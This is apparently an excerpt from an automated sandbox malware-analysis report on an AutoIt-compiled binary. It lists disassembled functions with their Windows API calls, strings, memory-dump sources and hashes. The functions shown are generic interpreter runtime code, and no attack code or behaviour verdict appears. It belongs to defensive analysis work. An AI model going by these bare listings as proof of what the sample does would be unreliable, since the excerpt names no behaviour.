                                                                  Function 003A79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 003A79C6
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 003A79D1
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 003A79DC
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 003A79E7
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 003A79F2
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 003A79FD
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 003A7A08
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 003A7A13
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 003A7A1E
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 003A7A29
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 003A7A34
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 003A7A3F
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 003A7A4A
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 003A7A55
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 003A7A60
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 003A7A6B
                                                                  • GetCursorInfo.USER32(?), ref: 003A7A7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$Info
                                                                  • String ID:
                                                                  • API String ID: 2577412497-0
                                                                  • Opcode ID: 94d310f39413fabcd02d0c336d614351729db1c964cc830fc51661b7d34ca342
                                                                  • Instruction ID: 712c2d83574108e576f94a811e68c58a0191492829b5c10888dff13200aa3fec
                                                                  • Opcode Fuzzy Hash: 94d310f39413fabcd02d0c336d614351729db1c964cc830fc51661b7d34ca342
                                                                  • Instruction Fuzzy Hash: F93113B0E0831A7ADB119FB68C8995FBFE8FF04750F50452AA50DE7280DA78A5008FA1
                                                                  Function 0035C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0035C8B7,?,00002000,?,?,00000000,?,0035419E,?,?,?,003EDC00), ref: 0036E984
                                                                    • Part of subcall function 0035660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003553B1,?,?,003561FF,?,00000000,00000001,00000000), ref: 0035662F
                                                                  • __wsplitpath.LIBCMT ref: 0035C93E
                                                                    • Part of subcall function 00371DFC: __wsplitpath_helper.LIBCMT ref: 00371E3C
                                                                  • _wcscpy.LIBCMT ref: 0035C953
                                                                  • _wcscat.LIBCMT ref: 0035C968
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0035C978
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0035CABE
                                                                    • Part of subcall function 0035B337: _wcscpy.LIBCMT ref: 0035B36F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 2258743419-1018226102
                                                                  • Opcode ID: 4b657c773094aaeeda08626877d8d339d0913f250954d0196998fb9498ae9b51
                                                                  • Instruction ID: d879a89065307af1d786ee79812155611d647d0639ce384edc28367b391b0cfe
                                                                  • Opcode Fuzzy Hash: 4b657c773094aaeeda08626877d8d339d0913f250954d0196998fb9498ae9b51
                                                                  • Instruction Fuzzy Hash: 791271715083419FC726EF24C841EAFBBE5BF99304F44891EF9899B261DB30DA49CB52
                                                                  Function 003BCE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003BCEFB
                                                                  • DestroyWindow.USER32(?,?), ref: 003BCF73
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003BCFF4
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003BD016
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003BD025
                                                                  • DestroyWindow.USER32(?), ref: 003BD042
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00350000,00000000), ref: 003BD075
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003BD094
                                                                  • GetDesktopWindow.USER32 ref: 003BD0A9
                                                                  • GetWindowRect.USER32(00000000), ref: 003BD0B0
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003BD0C2
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003BD0DA
                                                                    • Part of subcall function 0036B526: GetWindowLongW.USER32(?,000000EB), ref: 0036B537
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 3877571568-3619404913
                                                                  • Opcode ID: 78447961e28836f7d5227dcbf12a571a725ce863dba2e57b7e43d00e404789e0
                                                                  • Instruction ID: 97869a373d1496a2d1ed09f193358d3968349215123fbdceb8af99a792d435cf
                                                                  • Opcode Fuzzy Hash: 78447961e28836f7d5227dcbf12a571a725ce863dba2e57b7e43d00e404789e0
                                                                  • Instruction Fuzzy Hash: 3771F1B0540305AFD722DF28CC85FB677E9EB88708F44451DFA85872A1E735E942CB56
                                                                  Function 003BF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 003BF37A
                                                                    • Part of subcall function 003BD7DE: ClientToScreen.USER32(?,?), ref: 003BD807
                                                                    • Part of subcall function 003BD7DE: GetWindowRect.USER32(?,?), ref: 003BD87D
                                                                    • Part of subcall function 003BD7DE: PtInRect.USER32(?,?,003BED5A), ref: 003BD88D
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003BF3E3
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003BF3EE
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003BF411
                                                                  • _wcscat.LIBCMT ref: 003BF441
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003BF458
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003BF471
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 003BF488
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 003BF4AA
                                                                  • DragFinish.SHELL32(?), ref: 003BF4B1
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003BF59C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                  • API String ID: 169749273-3440237614
                                                                  • Opcode ID: efe082ed3d610479cb46782c7f4fad0ce860305e42b6de051fa8456379b74aa5
                                                                  • Instruction ID: 16ffb322388237f6d07051f055f15c11c185710c5f9598f5435f687ba4a16500
                                                                  • Opcode Fuzzy Hash: efe082ed3d610479cb46782c7f4fad0ce860305e42b6de051fa8456379b74aa5
                                                                  • Instruction Fuzzy Hash: FA614B71108301AFC712EF64DC45E9BBBF8EF89714F404A2EF695961A1DB709A09CB52
                                                                  Function 0039AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000000), ref: 0039AB3D
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0039AB46
                                                                  • VariantClear.OLEAUT32(?), ref: 0039AB52
                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0039AC40
                                                                  • __swprintf.LIBCMT ref: 0039AC70
                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 0039AC9C
                                                                  • VariantInit.OLEAUT32(?), ref: 0039AD4D
                                                                  • SysFreeString.OLEAUT32(00000016), ref: 0039ADDF
                                                                  • VariantClear.OLEAUT32(?), ref: 0039AE35
                                                                  • VariantClear.OLEAUT32(?), ref: 0039AE44
                                                                  • VariantInit.OLEAUT32(00000000), ref: 0039AE80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                  • API String ID: 3730832054-3931177956
                                                                  • Opcode ID: bd57efe4f8da1b7f47bff6b6fe14875a64f6d6b89bc379f0e551b8921c05561b
                                                                  • Instruction ID: 832f41d4afe4bf664c088478e551a03da0aa6962b6503bdd71e0ca624bf84393
                                                                  • Opcode Fuzzy Hash: bd57efe4f8da1b7f47bff6b6fe14875a64f6d6b89bc379f0e551b8921c05561b
                                                                  • Instruction Fuzzy Hash: 5BD10271A00A19DBCF23AF65D885B6AB7B9FF04710F268256E4059F590DB70EC40DBE2
                                                                  Function 003B716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 003B71FC
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003B7247
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: d962e0fb052f02e045d24c2e9551fe352ada9374696327ad1fbf3597c6b97cbe
                                                                  • Instruction ID: 0a5d3f8a0b10939705120b952d4c0dc5011d70e572541dd42a0952fdc8bf2fa8
                                                                  • Opcode Fuzzy Hash: d962e0fb052f02e045d24c2e9551fe352ada9374696327ad1fbf3597c6b97cbe
                                                                  • Instruction Fuzzy Hash: 9D9181742047018FCB06EF10C451AAEB7A5EF84314F118869FD966FBA2DB34ED0ACB95
                                                                  Function 0038CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnumChildWindows.USER32(?,0038CF50), ref: 0038CE90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: 4+@$CLASS$CLASSNN$H+@$INSTANCE$L+@$NAME$P+@$REGEXPCLASS$T+@$TEXT
                                                                  • API String ID: 3555792229-691921414
                                                                  • Opcode ID: 51019699a0973a77a919ebae3f6c558ea33ace453b98df59db80375941b02794
                                                                  • Instruction ID: b9b4089f2518b454cfea1b25abb2540de7afff664b13d98ddde9a9ab52a05959
                                                                  • Opcode Fuzzy Hash: 51019699a0973a77a919ebae3f6c558ea33ace453b98df59db80375941b02794
                                                                  • Instruction Fuzzy Hash: 519183306106069ACB1AFF60C481BEAFB75BF04300F5095AAE959AB191DF30795ECBE4
                                                                  Function 003BE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003BE5AB
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003BBEAF), ref: 003BE607
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003BE647
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003BE68C
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003BE6C3
                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,003BBEAF), ref: 003BE6CF
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003BE6DF
                                                                  • DestroyIcon.USER32(?,?,?,?,?,003BBEAF), ref: 003BE6EE
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003BE70B
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003BE717
                                                                    • Part of subcall function 00370FA7: __wcsicmp_l.LIBCMT ref: 00371030
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 1212759294-1154884017
                                                                  • Opcode ID: 3f7beac1efef60c978f72a2429c6dc4e8b3661bd3640b72fa2c815b52a4b80a1
                                                                  • Instruction ID: 0472f9a932dacbfb9b53f7f1ac62b4f98838138a078463de364642a4d31d630f
                                                                  • Opcode Fuzzy Hash: 3f7beac1efef60c978f72a2429c6dc4e8b3661bd3640b72fa2c815b52a4b80a1
                                                                  • Instruction Fuzzy Hash: AA61C171500215FAEB26DF68DC46FEE77ACBB09719F108106FA15EA1D0EB74E980C7A0
                                                                  Function 0039D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0039D292
                                                                  • GetDriveTypeW.KERNEL32 ref: 0039D2DF
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039D327
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039D35E
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039D38C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1148790751-4113822522
                                                                  • Opcode ID: ffbddb3e75375426393a76b0a956f4b62dcbaaa26e0417ce125f13dcca388a01
                                                                  • Instruction ID: 4979be6f001717eca9fb502574a997a6abc8c6b11d900b7b9a7347f8309dfc8a
                                                                  • Opcode Fuzzy Hash: ffbddb3e75375426393a76b0a956f4b62dcbaaa26e0417ce125f13dcca388a01
                                                                  • Instruction Fuzzy Hash: 28514D756047059FC701EF10C892D6AB7F8EF98759F10886DF8856B2A1DB31EE09CB82
                                                                  Function 003926BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003C3973,00000016,0000138C,00000016,?,00000016,003EDDB4,00000000,?), ref: 003926F1
                                                                  • LoadStringW.USER32(00000000,?,003C3973,00000016), ref: 003926FA
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003C3973,00000016,0000138C,00000016,?,00000016,003EDDB4,00000000,?,00000016), ref: 0039271C
                                                                  • LoadStringW.USER32(00000000,?,003C3973,00000016), ref: 0039271F
                                                                  • __swprintf.LIBCMT ref: 0039276F
                                                                  • __swprintf.LIBCMT ref: 00392780
                                                                  • _wprintf.LIBCMT ref: 00392829
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00392840
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 618562835-2268648507
                                                                  • Opcode ID: 1cb4f1bb738f49282ff342efaab1da679cc107374018040a8701233c183dcabf
                                                                  • Instruction ID: 66df11e4667086e0825b3582a41a34531171de6e84fd664a549262b31713abaf
                                                                  • Opcode Fuzzy Hash: 1cb4f1bb738f49282ff342efaab1da679cc107374018040a8701233c183dcabf
                                                                  • Instruction Fuzzy Hash: 34414072800619BACF16FBD0DD96EEFB77CAF14345F100065B9057A0A2EA746F09CB60
                                                                  Function 0039D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0039D0D8
                                                                  • __swprintf.LIBCMT ref: 0039D0FA
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0039D137
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0039D15C
                                                                  • _memset.LIBCMT ref: 0039D17B
                                                                  • _wcsncpy.LIBCMT ref: 0039D1B7
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0039D1EC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0039D1F7
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0039D200
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0039D20A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 3763975cee1b97e3187a282b209fb904fe6f44c8ebfc24c98e0bbdb37a54af9e
                                                                  • Instruction ID: 3f74df1aa47d260485c7e8dca9ebaeaf1cf72510f0083a3db0f1338af6bb931d
                                                                  • Opcode Fuzzy Hash: 3763975cee1b97e3187a282b209fb904fe6f44c8ebfc24c98e0bbdb37a54af9e
                                                                  • Instruction Fuzzy Hash: D83181B6500109ABDB22DFA4DC49FEB77BCEF89740F1040B6F509D61A1E774D6458B24
                                                                  Function 003BE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003BBEF4,?,?), ref: 003BE754
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE76B
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE776
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE783
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003BE78C
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE79B
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003BE7A4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE7AB
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003BBEF4,?,?,00000000,?), ref: 003BE7BC
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,003DD9BC,?), ref: 003BE7D5
                                                                  • GlobalFree.KERNEL32(00000000), ref: 003BE7E5
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 003BE809
                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003BE834
                                                                  • DeleteObject.GDI32(00000000), ref: 003BE85C
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003BE872
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
